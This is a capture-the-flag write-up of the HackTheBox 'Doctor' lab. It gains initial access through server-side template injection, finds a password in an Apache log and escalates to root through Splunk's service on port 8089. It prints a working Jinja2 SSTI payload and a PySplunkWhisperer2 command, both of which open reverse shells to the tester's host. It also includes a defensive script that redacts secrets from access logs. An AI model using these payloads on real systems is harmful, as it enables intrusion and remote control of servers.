Basic information

Port scan

22,80,8089

$ nmap -sC -sV 10.10.10.209
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 13:25 CST
Nmap scan report for 10.10.10.209
Host is up (0.069s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.82 seconds

80

A medical practice website. It shows an email address, info@doctors.htb, so this domain can be added to the hosts file.

8089

Port 8089 is splunkd:

doctors.htb

10.10.10.209 doctors.htb

Register an arbitrary account and log in; inside there is a New Message feature:

The page source contains a comment:

<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->

Visiting http://doctors.htb/archive directly returns a blank page.

archive

Try entering some data; after submitting, it is displayed in the archive:

SSTI

Based on the response above, close the surrounding tags and append a payload; this confirms that SSTI is present:

SSTI exploit

Submit the payload, then refresh the archive page to get a shell as the web user:

payload

test3</title></item>{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

log password

In the /var/log/apache2 directory there is a backup file, which contains a password:

web@doctor:/var/log/apache2$ cat backup | grep pass
cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$ pwd
pwd
/var/log/apache2
web@doctor:/var/log/apache2$
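The password above was found in a web server access log: a user typed it into the email field of a password-reset form, and because the form sent its fields in the query string, the value was written to the Apache log in clear text. The following is an added example (not part of the original write-up) of a defensive check a practitioner could run over such logs: it parses Apache combined-format lines, flags query parameters that should never have been logged, and emits a redacted copy. The log lines, the list of credential-handling paths and the list of sensitive parameter names are constructed assumptions for this example.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Apache "combined" format: client identd user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names that usually carry secrets, wherever they appear (assumed list).
SENSITIVE_PARAMS = {"password", "passwd", "pass", "pwd", "token", "secret", "api_key", "apikey"}

# Endpoints that handle credentials (assumed list). Their query string should be empty:
# anything in it, even a password mistyped into an "email" field, ends up in the access log.
CREDENTIAL_PATHS = {"/login", "/reset_password", "/change_password", "/register"}

REDACTED = "[REDACTED]"

# Constructed sample log lines modelled on the combined format (not taken from any real host).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2020:11:17:34 +0200] "POST /reset_password?email=not-an-email HTTP/1.1" 500 453 "http://doctor.htb/reset_password" "Mozilla/5.0"
10.0.0.6 - - [05/Sep/2020:11:18:01 +0200] "GET /login?user=bob&password=example-pass HTTP/1.1" 200 1024 "-" "curl/7.68.0"
10.0.0.7 - - [05/Sep/2020:11:18:30 +0200] "GET /search?q=doctors HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one access-log line into its fields plus the decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qsl(parts.query, keep_blank_values=True)
    return entry


def find_leaks(entry):
    """Return (parameter, reason) pairs whose values should not be in the log."""
    leaks = []
    on_credential_path = entry["path"] in CREDENTIAL_PATHS
    for name, _value in entry["query"]:
        if name.lower() in SENSITIVE_PARAMS:
            leaks.append((name, "sensitive parameter name"))
        elif on_credential_path:
            # Name-based filtering alone misses this case; the endpoint decides.
            leaks.append((name, "query string on credential-handling endpoint"))
    return leaks


def redact_line(line):
    """Return the line with leaked query values replaced; unchanged if nothing is flagged."""
    entry = parse_line(line)
    if entry is None:
        return line
    leaked = {name for name, _ in find_leaks(entry)}
    if not leaked:
        return line
    cleaned = [(n, REDACTED if n in leaked else v) for n, v in entry["query"]]
    parts = urlsplit(entry["target"])
    new_target = urlunsplit(parts._replace(query=urlencode(cleaned, safe="[]")))
    return line.replace(entry["target"], new_target, 1)


def audit_log(text):
    """Scan a whole log; return (findings, redacted_text).

    Each finding is (client, path, parameter, reason)."""
    findings, out = [], []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry:
            for name, reason in find_leaks(entry):
                findings.append((entry["client"], entry["path"], name, reason))
        out.append(redact_line(line))
    return findings, "\n".join(out)


if __name__ == "__main__":
    found, cleaned_log = audit_log(SAMPLE_LOG)
    for f in found:
        print("LEAK %s %s param=%s (%s)" % f)
    print(cleaned_log)
```

The second rule is the one that matters for the case on this page: the leaked value sat in a parameter called `email`, which no list of secret-looking names would catch, so the check treats any query string on a credential-handling endpoint as a leak. Redacting after the fact limits exposure of an existing log; the actual fix is for such forms to send their fields in the request body and for the server not to log them.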

user flag

Use this password to switch to the shaun user and obtain user.txt:

Privilege escalation information

It is easy to see that splunkd is started as root:

root        1130  0.8  2.0 257468 82956 ?        Sl   07:12   0:01 splunkd -p 8089 start
root 1132 0.0 0.3 77664 13380 ? Ss 07:12 0:00 [splunkd pid=1130] splunkd -p 8089 start [process-runner]

A search turns up a related exploit script:

Privilege escalation &amp; root flag

python PySplunkWhisperer2_remote.py --lhost 10.10.14.8 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.14.8 5555 >/tmp/luci11"'

This gives a root shell directly, and root.txt is obtained:

References